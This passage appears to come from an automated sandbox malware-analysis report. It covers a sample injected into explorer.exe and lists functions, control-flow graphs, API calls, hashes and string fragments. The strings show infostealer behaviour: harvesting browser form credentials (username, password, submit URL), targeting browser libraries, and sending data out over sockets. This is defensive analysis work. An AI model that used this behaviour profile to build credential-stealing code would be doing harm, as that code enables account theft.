10eb2874-10eb28a1 184->185 185->177 185->178
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: getaddrinforecvsetsockopt
                                                      • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                      • API String ID: 1564272048-1117930895
                                                      • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                      • Instruction ID: eba317130879438da1b9113c009d5fe04a43d1205d431e4f41866bc890177222
                                                      • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                      • Instruction Fuzzy Hash: E7529E30618B488BCB59EF69C4857EAB7E1FF58304F50462ED4AFCB156DE30A949CB81
                                                      Function 10EB1232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 303 10eb1232-10eb1256 304 10eb18bd-10eb18cd 303->304 305 10eb125c-10eb1260 303->305 305->304 306 10eb1266-10eb12a0 305->306 307 10eb12bf 306->307 308 10eb12a2-10eb12a6 306->308 309 10eb12c6 307->309 308->307 310 10eb12a8-10eb12ac 308->310 311 10eb12cb-10eb12cf 309->311 312 10eb12ae-10eb12b2 310->312 313 10eb12b4-10eb12b8 310->313 315 10eb12f9-10eb130b 311->315 316 10eb12d1-10eb12f7 call 10eb1942 311->316 312->309 313->311 314 10eb12ba-10eb12bd 313->314 314->311 320 10eb1378 315->320 321 10eb130d-10eb1332 315->321 316->315 316->320 322 10eb137a-10eb13a0 320->322 323 10eb13a1-10eb13a8 321->323 324 10eb1334-10eb133b 321->324 325 10eb13aa-10eb13d3 call 10eb1942 323->325 326 10eb13d5-10eb13dc 323->326 327 10eb133d-10eb1360 call 10eb1942 324->327 328 10eb1366-10eb1370 324->328 325->320 325->326 331 10eb13de-10eb140a call 10eb1942 326->331 332 10eb1410-10eb1458 NtCreateFile call 10eb1172 326->332 327->328 328->320 329 10eb1372-10eb1373 328->329 329->320 331->320 331->332 339 10eb145d-10eb145f 332->339 339->320 340 10eb1465-10eb146d 339->340 340->320 341 10eb1473-10eb1476 340->341 342 10eb1478-10eb1481 341->342 343 10eb1486-10eb148d 341->343 342->322 344 10eb148f-10eb14b8 call 10eb1942 343->344 345 10eb14c2-10eb14ec 343->345 344->320 350 10eb14be-10eb14bf 344->350 351 10eb18ae-10eb18b8 345->351 352 10eb14f2-10eb14f5 345->352 350->345 351->320 353 10eb14fb-10eb14fe 352->353 354 10eb1604-10eb1611 352->354 356 10eb155e-10eb1561 353->356 357 10eb1500-10eb1507 353->357 354->322 358 10eb1567-10eb1572 356->358 359 10eb1616-10eb1619 356->359 360 10eb1509-10eb1532 call 10eb1942 357->360 361 10eb1538-10eb1559 357->361 367 10eb15a3-10eb15a6 358->367 368 10eb1574-10eb159d call 10eb1942 358->368 364 10eb16b8-10eb16bb 359->364 365 10eb161f-10eb1626 359->365 360->320 360->361 366 10eb15e9-10eb15fa 361->366 374 10eb1739-10eb173c 364->374 375 10eb16bd-10eb16c4 364->375 370 10eb1628-10eb1651 call 10eb1942 365->370 371 10eb1657-10eb166b call 10eb2e92 365->371 366->354 367->320 373 10eb15ac-10eb15b6 367->373 368->320 368->367 370->320 370->371 371->320 392 10eb1671-10eb16b3 371->392 373->320 381 10eb15bc-10eb15e6 373->381 378 10eb1742-10eb1749 374->378 379 10eb17c4-10eb17c7 374->379 382 10eb16c6-10eb16ef call 10eb1942 375->382 383 10eb16f5-10eb1734 375->383 387 10eb174b-10eb1774 call 10eb1942 378->387 388 10eb177a-10eb17bf 378->388 379->320 389 10eb17cd-10eb17d4 379->389 381->366 382->351 382->383 399 10eb1894-10eb18a9 383->399 387->351 387->388 388->399 394 10eb17fc-10eb1803 389->394 395 10eb17d6-10eb17f6 call 10eb1942 389->395 392->322 397 10eb182b-10eb1835 394->397 398 10eb1805-10eb1825 call 10eb1942 394->398 395->394 397->351 404 10eb1837-10eb183e 397->404 398->397 399->322 404->351 407 10eb1840-10eb1886 404->407 407->399
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: `
                                                      • API String ID: 823142352-2679148245
                                                      • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                      • Instruction ID: 2fb488e0ba75e1b70d5997f7ed582e19439af1de33737eda37af5ad463595a19
                                                      • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                      • Instruction Fuzzy Hash: 5E226970A18B499FCB99DF28C4957AAF7E1FB98314F91026EE05ED3650DB30E851CB81
                                                      Function 10EB2E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 447 10eb2e12-10eb2e38 448 10eb2e45-10eb2e6e NtProtectVirtualMemory 447->448 449 10eb2e40 call 10eb1942 447->449 450 10eb2e7d-10eb2e8f 448->450 451 10eb2e70-10eb2e7c 448->451 449->448
                                                      APIs
                                                      • NtProtectVirtualMemory.NTDLL ref: 10EB2E67
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryProtectVirtual
                                                      • String ID:
                                                      • API String ID: 2706961497-0
                                                      • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                      • Instruction ID: 1322bd0f9abb111dc0d16461814fd1db2bf6bde681bc1ca56d6868a904ecfc49
                                                      • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                      • Instruction Fuzzy Hash: 26017134668B884F9B88EF6CE48522AB7E4FBDD315F000B3EE99AC7254EB74D5414742
                                                      Function 10EB2E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 452 10eb2e0a-10eb2e6e call 10eb1942 NtProtectVirtualMemory 455 10eb2e7d-10eb2e8f 452->455 456 10eb2e70-10eb2e7c 452->456
                                                      APIs
                                                      • NtProtectVirtualMemory.NTDLL ref: 10EB2E67
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryProtectVirtual
                                                      • String ID:
                                                      • API String ID: 2706961497-0
                                                      • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                      • Instruction ID: fd8085a7a7a7dc9427788f5e877f2976b80ab975a506bca1a38baf5597b6d75b
                                                      • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                      • Instruction Fuzzy Hash: E501A234628B884B8B48EB2C94512A6B3E5FBCE314F400B7EE9DAC3250DB21D5024782
                                                      Function 10EAC8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • ObtainUserAgentString.URLMON ref: 10EAC9A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AgentObtainStringUser
                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                      • API String ID: 2681117516-319646191
                                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                      • Instruction ID: 614393ad8b494c45e5876af2d4d2d6c1a449bc8778c477cd2e4407d8ce02a8fb
                                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                      • Instruction Fuzzy Hash: 4D31F231614A4D8FCB45EFA9C8857EEBBE1FF98214F40422AE84ED7240DF789645C789
                                                      Function 10EAC8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • ObtainUserAgentString.URLMON ref: 10EAC9A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AgentObtainStringUser
                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                      • API String ID: 2681117516-319646191
                                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                      • Instruction ID: baf104c75d20692a929eb03cd60378035b30a2a2601f26e3d9ebc455a2ee1d21
                                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                      • Instruction Fuzzy Hash: B321F670610A4D8FCB05EFA9C8867EEBBE5FF58204F40422AE85AD7250DF749605C789
                                                      Function 10EA8B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 232 10ea8b66-10ea8b68 233 10ea8b6a-10ea8b6b 232->233 234 10ea8b93-10ea8bb8 232->234 235 10ea8bbe-10ea8c22 call 10eaf612 call 10eb1942 * 2 233->235 236 10ea8b6d-10ea8b71 233->236 237 10ea8bbb-10ea8bbc 234->237 246 10ea8c28-10ea8c2b 235->246 247 10ea8cdc 235->247 236->237 238 10ea8b73-10ea8b92 236->238 237->235 238->234 246->247 249 10ea8c31-10ea8cd3 call 10eb3da4 call 10eb3022 call 10eb33e2 call 10eb3022 call 10eb33e2 CreateMutexW 246->249 248 10ea8cde-10ea8cf6 247->248 249->247 263 10ea8cd5-10ea8cda 249->263 263->248
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateMutex
                                                      • String ID: .dll$el32$kern
                                                      • API String ID: 1964310414-1222553051
                                                      • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                      • Instruction ID: f0be730197d77b69721732209d379a5b5f38c177a55b5cf42ffc708f1b8377de
                                                      • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                      • Instruction Fuzzy Hash: 5D415A74918A08CFDB94EFA8C8D97ADB7E0FF68300F00417AD84ADB255DE309945CB95
                                                      Function 10EA8B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateMutex
                                                      • String ID: .dll$el32$kern
                                                      • API String ID: 1964310414-1222553051
                                                      • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                      • Instruction ID: c3e7eadafd74e2749ac409b98a48aa00cc0b4174a0e39fc0028fcd378ccb25ff
                                                      • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                      • Instruction Fuzzy Hash: 3B413A74918A088FDB94EFA8C8997ADB7F0FF68300F40416AD84ADB255DE309945CB95
                                                      Function 10EAE72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 293 10eae72e-10eae768 294 10eae76a-10eae782 call 10eb1942 293->294 295 10eae788-10eae7ab connect 293->295 294->295
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: connect
                                                      • String ID: conn$ect
                                                      • API String ID: 1959786783-716201944
                                                      • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                      • Instruction ID: 021261df957fe4aafab6e41a6cd2a84b2ef8d850ecffb3ace0d537def400eab5
                                                      • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                      • Instruction Fuzzy Hash: 0C015E30618B188FCB84EF1CE088B55B7E0FB58324F1545AEE90DCB226C674D8818BC2
                                                      Function 10EAE732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 298 10eae732-10eae768 299 10eae76a-10eae782 call 10eb1942 298->299 300 10eae788-10eae7ab connect 298->300 299->300
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: connect
                                                      • String ID: conn$ect
                                                      • API String ID: 1959786783-716201944
                                                      • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                      • Instruction ID: ca2e3afa187230081221d22a3a027d12af51f599dbfe4f308b1b9a3d555d7a20
                                                      • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                      • Instruction Fuzzy Hash: 68012C70618A1C8FCB84EF5CE088B55B7E0FB59324F1541AEA80DCB226CA74C9818BC2
                                                      Function 10EAE6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 411 10eae6b2-10eae6e5 412 10eae6e7-10eae6ff call 10eb1942 411->412 413 10eae705-10eae72d send 411->413 412->413
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID: send
                                                      • API String ID: 2809346765-2809346765
                                                      • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                      • Instruction ID: 5e7af992b863f5b46c69582ed190fab81e5a1cb8e10d1937752eb0ffe1899d36
                                                      • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                      • Instruction Fuzzy Hash: F4011270518A588FDB84EF1CE049B2577E0EB58314F1645AEE85DCB266C670D881CB81
                                                      Function 10EAE5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 416 10eae5b2-10eae5ea 417 10eae60a-10eae62b socket 416->417 418 10eae5ec-10eae604 call 10eb1942 416->418 418->417
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID: sock
                                                      • API String ID: 98920635-2415254727
                                                      • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                      • Instruction ID: d73c85bdbfb906d64f6c417e0a9cd4cd0046b63a9e72812ddddce3dc049585ce
                                                      • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                      • Instruction Fuzzy Hash: A40121706186588FC784DF1CE048B54BBE0FB59354F1545ADE45ECB266C7B0C981CB86
                                                      Function 10EA62DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 421 10ea62dd-10ea6320 call 10eb1942 424 10ea63fa-10ea640e 421->424 425 10ea6326 421->425 426 10ea6328-10ea6339 SleepEx 425->426 426->426 427 10ea633b-10ea6341 426->427 428 10ea634b-10ea6352 427->428 429 10ea6343-10ea6349 427->429 431 10ea6370-10ea6376 428->431 432 10ea6354-10ea635a 428->432 429->428 430 10ea635c-10ea636a call 10eb0f12 429->430 430->431 433 10ea6378-10ea637e 431->433 434 10ea63b7-10ea63bd 431->434 432->430 432->431 433->434 437 10ea6380-10ea638a 433->437 438 10ea63bf-10ea63cf call 10ea6e72 434->438 439 10ea63d4-10ea63db 434->439 437->434 440 10ea638c-10ea63b1 call 10ea7432 437->440 438->439 439->426 442 10ea63e1-10ea63f5 call 10ea60f2 439->442 440->434 442->426
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                      • Instruction ID: 49ec3b8bf9cb65bc13646ece741d3ba192219edef47ec6a57af63e69080741aa
                                                      • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                      • Instruction Fuzzy Hash: EA316BB4604B49DFDB94DF2A80882A5B7A0FB9D304F44427EC92DCE106CB74A459CF91
                                                      Function 10EA6412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 457 10ea6412-10ea6446 call 10eb1942 460 10ea6448-10ea6472 call 10eb3c9e CreateThread 457->460 461 10ea6473-10ea647d 457->461
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3839526492.0000000010E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 10E30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10e30000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                      • Instruction ID: 302f6b676a870e01d2d5ac8b744e61eb7ec9ea25e1eb06d8bfced179b00c6b7d
                                                      • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                      • Instruction Fuzzy Hash: 1DF04630228A484FD788EF2CD44663AF3E0FBEC214F41063EA94DC7220CA38C5818B16

                                                      Non-executed Functions

                                                      Function 0E04BD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                      • API String ID: 0-393284711
                                                      • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                      • Instruction ID: 482722534a5dd6e4742a42b96469ef52ce0ee32dd86c585e1bda50bced7ee86b
                                                      • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                      • Instruction Fuzzy Hash: A6E15AB1518B488FDBA8EF68C4947EBB7E0FB58300F504A2E959BC7255DF30A941CB85
                                                      Function 0E04E792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                      • API String ID: 0-2916316912
                                                      • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                      • Instruction ID: e37934718577678bfa302da01e740690506cb0f3535d9b8ff7985256530e75f9
                                                      • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                      • Instruction Fuzzy Hash: BBB18E71518B488EDB65EF68C489AEEB7F1FF58300F90491ED49AC7251EF70A805CB86
                                                      Function 0E04C622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                      • API String ID: 0-1539916866
                                                      • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                      • Instruction ID: ba372bd11bdc06e16272cdd513b831e57597b88b8326ba9bf2f9bc1f51cdba02
                                                      • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                      • Instruction Fuzzy Hash: C741B6B0A19B0C8FEB14DF88A4957BDBBE6FB88700F00026ED409D7245DBB59D458BD6
                                                      Function 0E053AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                      • API String ID: 0-355182820
                                                      • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                      • Instruction ID: da991e06bc4e310da9bd5c9c63d82bdb09b4e5b2841a167f676424ce217f7d8f
                                                      • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                      • Instruction Fuzzy Hash: D4C16C71218B098FC758EF64C495AEBF3E1FB94304F404A2E999AC7254DF30E955CB86
                                                      Function 0E053F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                      • API String ID: 0-97273177
                                                      • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                      • Instruction ID: db91729550290e8f9f3b9a33293a9700deae4123dd40923ee44d3a2e19dbfc7e
                                                      • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                      • Instruction Fuzzy Hash: F251EF322187488FD719DF58C8852EBB7E5FB85300F501A2EE8DBC7201DBB49946CB82
                                                      Function 0E04D2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                      • API String ID: 0-639201278
                                                      • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                      • Instruction ID: 60d0e57fd22a8d80c473bbf00830f3bab50ac8186b8f6e8a566683cc38a39afd
                                                      • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                      • Instruction Fuzzy Hash: D6C172B1618A198FC758EF68D495AEAF3E1FB94300F80476D984EC7254DF30EA42CB85
                                                      Function 0E04D2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                      • API String ID: 0-639201278
                                                      • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                      • Instruction ID: 4f745f6eeb2f36e60f36614f63ed1956748d79efc398ec04c3bd0a9c7e8f8da1
                                                      • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                      • Instruction Fuzzy Hash: 21C171B1618A198FC758EF68D495AEAF3E1FB94300F90476D984EC7254DF30EA42CB85
                                                      Function 0E04ECD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3837503470.000000000DFD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DFD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_dfd0000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                      • API String ID: 0-2058692283
                                                      • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                      • Instruction ID: b2f70b575d309adf0e4a072d0102fda9899ee01e87584cc3c8a74e1609d1b3bb
                                                      • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                      • Instruction Fuzzy Hash: AAA19FB16187488FDB29EFA8D4447EEB7E1FF88300F404A2DD48AD7251EF7099468789
                                                      Function 0E04ECE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
